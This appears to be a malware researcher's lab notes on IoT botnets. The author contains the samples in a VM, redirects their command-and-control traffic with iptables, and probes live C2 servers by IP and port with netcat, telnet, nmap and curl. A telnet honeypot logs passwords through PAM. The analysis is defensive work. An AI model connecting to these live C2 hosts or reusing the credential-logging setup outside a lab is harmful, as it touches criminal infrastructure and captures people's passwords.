RESPONSE: (b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)

With terminal color codes stripped, this results in:

(REMOTE BEACON)

ユーザー名:

パスワード:

チェックイン情報... |

Japanese. Unique language in malware to date for me. Lots of Chinese, Russian, even Portuguese, not much Japanese. Translated:

(REMOTE BEACON)

username:

password:

Check -in information ... |

Okay, that seems promising somehow. It just resets the connection afterwards though. This is progress, as I clearly got past the username and password.

I don't see much with regard to “check-in” information, so I'll see if the CONTAINED dropped traffic changes after it pings in. I also might need to have the server listen() for future connections on that same port, as this might just start as a port knock or something.

Back to contained malware:

(CONTAINED VM)

RECV DATA: (b'\x03\x00\x02\x01', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
RECV DATA: (b'\x00', None)
SEND DATA: b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'

So it seems like it just connects multiple times until it doesn't reset? I don't know how much of that is just the spam overloading the VM, or if I'm just supposed to callback immediately after with a b'\x00\x00' after getting a successful login. It's also somehow probably just spamming my own server code in a poor way and it's reacting wrong. I'll try that first, though.

Is this whole server just a callback for tallying purposes? I don't understand it just overly spams everything. Either that's intended to help prevent exactly what I'm doing, or the remote server is just going to take a tally of unique IPs that connect in. At some point I have to call it, but not yet. One last try. What if I block these RST packets they keep flying around in IPTables?

# iptables -t nat -A OUTPUT -d 46.19.137.50 -p tcp --dport 55566 --syn -m state --state NEW -m connlimit --connlimit-upto 1 -j DNAT --to-destination 127.0.0.1
# iptables -A OUTPUT -d 46.19.137.50 -p tcp --tcp-flags RST RST -j DROP

(CONTAINED VM)

RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)

Somehow that made it worse. Perhaps if I drop all packets going to port 23 and 2323 from within the VM to reduce network load? Or REJECT entirely? Timing issues?

# iptables -t nat -A OUTPUT -d 46.19.137.50 -j DNAT --to-destination 127.0.0.1
# iptables -t nat -A OUTPUT -d 46.19.137.50 -p tcp --dport 55566 --syn -m state --state NEW -m connlimit --connlimit-upto 1 -j DNAT --to-destination 127.0.0.1
# iptables -A OUTPUT -d 46.19.137.50 -p tcp --tcp-flags RST RST -j DROP
# iptables -A OUTPUT -p tcp --dport 23 -j DROP
# iptables -A OUTPUT -p tcp --dport 2323 -j DROP

Tried a few different combinations of the above options, but nothing worked. I decided to give up since the remote server is too inconsistent in its responses. It seems random how it responds, possibly due to it's own defenses, possibly because it's just a ruse.

TropicalV1 // 194.31.98.17:1337

TropicalV1 | &lt;3 - 0x
inetnum:        194.31.98.0 - 194.31.98.255
netname:        SERVER-194-31-98-0
country:        NL
org:            ORG-SB700-RIPE
admin-c:        SBAH26-RIPE
tech-c:         SBAH26-RIPE
status:         ASSIGNED PA
mnt-by:         PREFIXBROKER-MNT
created:        2022-02-28T08:21:25Z
last-modified:  2022-02-28T08:21:25Z
source:         RIPE

organisation:   ORG-SB700-RIPE
org-name:       Serverion BV
org-type:       OTHER
address:        Krammer 8
address:        3232HE Brielle
address:        Netherlands
abuse-c:        SBAH26-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2022-02-28T08:21:25Z
last-modified:  2022-02-28T08:21:25Z
source:         RIPE # Filtered
curl -i http://194.31.98.17/bins/
HTTP/1.1 200 OK
Date: Fri, 03 Jun 2022 06:25:09 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 02 Jun 2022 21:26:00 GMT
ETag: "4-5e07da6fb0f7e"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html; charset=UTF-8

Hey
$ nc 194.31.98.17 1337

������"████████╗██████╗  ██████╗ ██████╗ ██╗ ██████╗ █████╗ ██╗         ██╗   ██╗ ██╗
╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║██╔════╝██╔══██╗██║         ██║   ██║███║
   ██║   ██████╔╝██║   ██║██████╔╝██║██║     ███████║██║         ██║   ██║╚██║
   ██║   ██╔══██╗██║   ██║██╔═══╝ ██║██║     ██╔══██║██║         ╚██╗ ██╔╝ ██║
   ██║   ██║  ██║╚██████╔╝██║     ██║╚██████╗██║  ██║███████╗     ╚████╔╝  ██║
   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝      ╚═══╝   ╚═╝
                            TropicalV1 As cheap as $5
                        Total Users 4 - Total Attacks 167


    ╔══════════════════════════════════════════════════╗
    ║                  Username :                      ║
    ╚══════════════════════════════════════════════════╝
    ╔══════════════════════════════════════════════════╗
    ║                  Password :                      ║
    ╚══════════════════════════════════════════════════╝

Annnnnd here's where I had a unbrainfart. Between the initial command characters, and the raw terminal codes in the previous botnet login, I realized this is probably just the actual telnet protocol. Like RFC telnet. Doh. As someone who came out of the 90s with the mindset of never touching telnet again, the only use I had for telnet was the client for debugging raw socket sessions. While that works, it conditions oneself to think of telnet as a raw socket protocol which it is not fully. It's just the lightest protocol there could possibly be, and it works as a debugger that way quite nicely sometimes.

So, let's just try telnet.

$ telnet 194.31.98.17 1337
Trying 194.31.98.17...
Connected to 194.31.98.17.
Escape character is '^]'.

████████╗██████╗  ██████╗ ██████╗ ██╗ ██████╗ █████╗ ██╗         ██╗   ██╗ ██╗
╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║██╔════╝██╔══██╗██║         ██║   ██║███║
   ██║   ██████╔╝██║   ██║██████╔╝██║██║     ███████║██║         ██║   ██║╚██║
   ██║   ██╔══██╗██║   ██║██╔═══╝ ██║██║     ██╔══██║██║         ╚██╗ ██╔╝ ██║
   ██║   ██║  ██║╚██████╔╝██║     ██║╚██████╗██║  ██║███████╗     ╚████╔╝  ██║
   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝      ╚═══╝   ╚═╝
                            TropicalV1 As cheap as $5
                        Total Users 4 - Total Attacks 167

    ╔══════════════════════════════════════════════════╗
    ║                  Username :                      ║
    ╚══════════════════════════════════════════════════╝

Yeah, just telnet. Even has control codes for “Username” working for expanding the menu to “Password” when it goes on which I wasn't getting with raw sockets. All because the raw terminal codes were being ignored. That should not have taken that long for me to realize.

Trying telnetd // PAM logging

Have to sideload some packages from an internet connected VM (just apt download):

# dpkg -i openbsd-inetd_0.20160825-5_amd64.deb
# dpkg -i tcpd_7.6.q-31_amd64.deb
# dpkg -i telnet_0.17-44_amd64.deb
# dpkg -i telnetd_0.17-44_amd64.deb

For logging passwords raw, apparently at least I can't find any really well documented way to do this officially. There is this article and this PAM module that seem to work for me:

https://www.adeptus-mechanicus.com/codex/logsshp/logsshp.html

https://silicon-verl.de/home/flo/software/pamcifs.html

After editing, compiling, loading into PAM, configuring, etc…

My login attempt via telnet from the contained VM:

(CONTAINED VM)

$ telnet 194.31.98.17 1337
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Kali GNU/Linux Rolling
kali login: johhny
Password:

(CONTAINED VM)

Jun 04 05:06:29 kali pam_storepw[166292]: writing to /var/log/passwords

(CONTAINED VM)

host = localhost : username = johhny : password = asd

After infection, nothing. Completely blank. It's not making a full connection still. It's either expecting certain output from the server, or expecting certain headers or telnet options. Baud rate, possibly? Possibly a modified telnet server to output a certain set of byte(s) in the header like previously noticed?

(CONTAINED VM)

Jun 04 05:12:12 kali in.telnetd[168378]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168378]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168383]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168383]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168384]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168384]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168385]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168385]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168386]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168386]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168387]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168387]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168392]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168392]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168393]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168393]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168394]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168394]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168395]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168395]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168400]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168400]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168401]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168401]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168402]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168402]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168403]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168403]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168408]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168408]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168409]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168409]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168410]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168410]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168411]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168411]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168412]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168412]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168413]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168413]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168414]: connect from 192.168.XX.YY (192.168.XX.YY)

So, this malware is even spamming a standard telnet server. Either it's expecting specific output from the server, or it's expecting these weird headers/tags. It could just be posing as a telnet server and the magic headers are how you really get in. TCP flag manipulation is also a possibility.

Back to Netcat for TropicalV1

Haven't tried listening with Netcat for this to see if I can grab some header just to compare with the miori header. Let's try it.

# iptables -t nat -A OUTPUT -d 194.31.98.17 -j DNAT --to-destination 127.0.0.1
# nc -l -p 1337 -o hexout.txt
invalid connection to [127.0.0.1] from (UNKNOWN) [192.168.XX.YY] 55162

Saitama121 // 2.56.59.196:7777

Very simple one this time:

(REMOTE BEACON)

$ nc 2.56.59.196 7777
������"Username:


Password:

Invalid Credentials. Connection Logged!

(REMOTE BEACON)

$ telnet 2.56.59.196 7777
Username:Connection closed by foreign host.

Back to jiggling the lock…

(REMOTE BEACON)

SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND DATA: b'\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)

Odd response, just resets the login process. I do find it interesting that it has the same set of header responses here as miori, though. Time to contain Saitama121 like the others and see if I can suss anything out of that binary's network streams.

Mapping Chaff 23/2323 Connections

The excess IPs are abundant, so let's map them because why not. Maybe they are targeted DDoS extras, maybe it's randomly generated.

Generate CSVs

# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_miori.txt | gzip > contained_miori.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_saitama121.txt | gzip > contained_saitama121.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_tropicalv1.txt | gzip > contained_tropicalv1.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_wgetflood.txt | gzip > contained_wgetflood.csv.gz
$ wc -l redacted/logs/contained_{miori,saitama121,tropicalv1,wgetflood}.txt
  1014986 redacted/logs/contained_miori.txt
  1126091 redacted/logs/contained_saitama121.txt
   292877 redacted/logs/contained_tropicalv1.txt
   101120 redacted/logs/contained_wgetflood.txt
  2535074 total

Not a walk in the park. This could take multiple days to geolocate. Will likely have to take a random sample of the IPs generated since they go on seemingly forever.

Unnamed // 45.95.55.27:32774

(REMOTE BEACON)

$ nc 45.95.55.27 32774
Ncat: Broken pipe.

(REMOTE BEACON)

$ telnet 45.95.55.27 32774
Trying 45.95.55.27...
Connected to 45.95.55.27.
Escape character is '^]'.

Connection closed by foreign host.

(REMOTE BEACON)

$ nmap -p 32774 45.95.55.27
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 14:31 CDT
Nmap scan report for 45.95.55.27.fly-hosting.net (45.95.55.27)
Host is up (0.12s latency).

PORT      STATE SERVICE
32774/tcp open  sometimes-rpc11

Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds

(REMOTE BEACON)

SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'', None)
SEND DATA: b'\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'

Seems very different. Just not responding at all.

Chaff CSV Load

chaff_miori_csv <- read.csv("contained_miori.csv.gz")
chaff_saitama121_csv <- read.csv("contained_saitama121.csv.gz")
chaff_tropicalv1_csv <- read.csv("contained_tropicalv1.csv.gz")
chaff_wgetflood_csv <- read.csv("contained_wgetflood.csv.gz")
chaff_uwu_csv <- read.csv("contained_uwu.csv.gz")

Geolocate

chaff_miori <- unique(chaff_miori_csv)
chaff_saitama121 <- unique(chaff_saitama121_csv)
chaff_tropicalv1 <- unique(chaff_tropicalv1_csv)
chaff_wgetflood <- unique(chaff_wgetflood_csv)
chaff_uwu <- unique(chaff_uwu_csv)

Sample the Large Datasets

EDIT: Trial and error has shown this to be roughly an 8 hour process sequentially per 5000 IPs.

set.seed(912903)
SAMPLE_SIZE <- 5000
chaff_miori <- chaff_miori[
    sample(rownames(chaff_miori), SAMPLE_SIZE),
]
chaff_saitama121 <- chaff_saitama121[
    sample(rownames(chaff_saitama121), SAMPLE_SIZE),
]
chaff_tropicalv1 <- chaff_tropicalv1[
    sample(rownames(chaff_tropicalv1), SAMPLE_SIZE),
]
chaff_wgetflood <- chaff_wgetflood[
    sample(rownames(chaff_wgetflood), SAMPLE_SIZE),
]
